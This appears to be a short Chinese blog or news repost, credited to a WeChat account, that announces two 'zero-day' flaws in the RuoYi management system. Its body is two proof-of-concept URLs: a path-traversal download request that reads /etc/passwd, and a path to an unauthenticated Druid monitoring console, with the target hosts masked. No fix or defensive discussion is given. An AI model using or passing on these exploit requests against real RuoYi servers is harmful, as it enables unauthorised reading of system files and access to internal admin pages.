若依CMS 0day 任意文件读取 or 未授权访问

发布日期:2021-04-22 浏览次数: 8770 次

若依管理系统后台任意文件读取

POC:

https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd

若依管理系统未授权访问

POC:

http://xxx.xxx.xxx.xxx/prod-api/druid/index.html

转自微信公众号黑白之道

分享到:
×

微信扫一扫分享